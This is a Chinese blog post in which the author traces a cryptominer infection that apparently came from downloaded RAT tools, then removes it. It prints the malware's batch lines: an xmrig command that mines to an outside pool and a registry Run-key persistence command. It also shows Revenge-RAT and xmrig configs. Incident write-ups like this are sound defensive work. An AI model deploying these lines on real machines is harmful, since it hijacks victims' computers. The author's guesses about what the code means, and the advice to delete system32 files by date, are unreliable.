0x00 前言
近日因为在一些文章中看到了远控这块,所以就在网上找了一些资源小研究了一下,然而今天研究完关机,回去重启以后出现下面这个弹框。
前方低能,各位大佬勿喷~
0x01 溯源分析
对于那个黑框框中的exe文件,我先百度了一波。发现是一个挖矿病毒
知道这是病毒了,但是不知道在哪啊,溯源?咋溯源?咱也不知道啊,咋整?还是360香~~
根据360的扫描结果定位到system32这个目录。先不一键处理,先到这个目录看看情况吧。在C盘中看到如下一些文件
打开这个文件,代码如下
1 2 3
| @echo off xmrig.exe -o xmr.crypto-pool.fr:3333 -u 45U77PaDJanVNk3ePum21GTB3BbA89ppF6Jo8UMpadCp9gnm9W9amSE4LNCk4tsiS1PNALDMUjvPF8PPVtkgikggJZeuChz -p x -k -B Pause
|
emmmm,虽然,好像,看不懂这个代码的具体意思,但是根据我的一些经验来看,应该是xmrig这个程序输出 xmr.crypto-pool.fr这个文件,在网上看到这就是个挖矿的病毒程序,并且采用了一些加密的方式,后面密文估计就是加密的啥玩意(我也不懂,手动滑稽)
再看看start.cmd
1 2 3
| @echo off xmrig.exe pause
|
看看run.bat中的代码
1 2 3 4 5
| @echo off
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v BGClient /t REG_SZ /d C:\System32\TTy_start.bat /F
pause
|
从这个代码来看,是将C:\System32\TTy_start.bat添加到注册表了,到这个对应的注册表看看吧。
果然在注册表中找到了这个批处理文件,并且从注册表中的意思就可以看出来意思是每次开机都会启动这个C:\System32\Tty_start.bat这个批处理文件。
分析完注册表,我们再到system32这个文件夹 ,看到文件夹中还有两个config的文件,就打开看了一下
打开config.xml代码如下,有个2222端口,2222端口是我今天使用配置的端口,我猜测这应该是我今天使用产生的配置文件了。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57
| <?xml version="1.0" encoding="utf-8"?> <Rev> <Socket_Key> <![CDATA[Revenge-RAT]]> </Socket_Key> <Connections_Port> <![CDATA[2222]]> </Connections_Port> <Minimizing> <![CDATA[True]]> </Minimizing> <Listening> <![CDATA[False]]> </Listening> <Ping> <![CDATA[15]]> </Ping> <Visual> <![CDATA[True]]> </Visual> <Notification> <![CDATA[False]]> </Notification> <Sound> <![CDATA[False]]> </Sound> <Desktop> <![CDATA[True]]> </Desktop> <DesktopValue> <![CDATA[2]]> </DesktopValue> <Webcam> <![CDATA[True]]> </Webcam> <WebcamValue> <![CDATA[2]]> </WebcamValue> <ThumbnailsValue> <![CDATA[2]]> </ThumbnailsValue> <Flags> <![CDATA[1]]> </Flags> <Gridlines> <![CDATA[True]]> </Gridlines> <View> <![CDATA[2]]> </View> <Theme> <![CDATA[0]]> </Theme> <ACR> <![CDATA[True]]> </ACR> </Rev>
|
在打开config.json看看
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43
| { "algo": "cryptonight", "api": { "port": 0, "access-token": null, "id": null, "worker-id": null, "ipv6": false, "restricted": true }, "asm": true, "autosave": true, "av": 0, "background": false, "colors": true, "cpu-affinity": null, "cpu-priority": null, "donate-level": 5, "huge-pages": true, "hw-aes": null, "log-file": null, "max-cpu-usage": 100, "pools": [ { "url": "donate.v2.xmrig.com:3333", "user": "YOUR_WALLET_ADDRESS", "pass": "x", "rig-id": null, "nicehash": false, "keepalive": false, "variant": -1, "tls": false, "tls-fingerprint": null } ], "print-time": 60, "retries": 5, "retry-pause": 5, "safe": false, "threads": null, "user-agent": null, "watch": true }
|
里面有个pools
WC,这TM不会是别人的远程连接马吧,现在还连接着我的电脑???
ping了一下,还真能ping通。WCNM。
0x02 消毒
听说有人要消毒?我带了瓶84,不知道够不够用。
首先删除我们刚刚在注册表中的BGClient这一项。
然后到C盘将system32这个目录直接删掉
本来以为这样就完事了,又去Windows下的system32看了一下,我看到system32的最后修改时间是11月21日,我靠不就是今天吗,不会这里面也被写了什么东西了吧,
进去按照时间排序来看果然有几个文件,看着就很像病毒或者被病毒捆绑的玩意。奈何自己太菜,还不能分析这些东西,算了,干脆一不做二不休,直接删了得了。(我真聪明,手动大笑)
最后,清空回收站,重启~~
0x03 总结
研究技术会有可能被反噬的,大家要注意安全。不安全的软件先扔到虚拟机里面搞搞,没有问题在拿到本机来用,万一虚拟机炸了,还可以快照一键还原啊。
###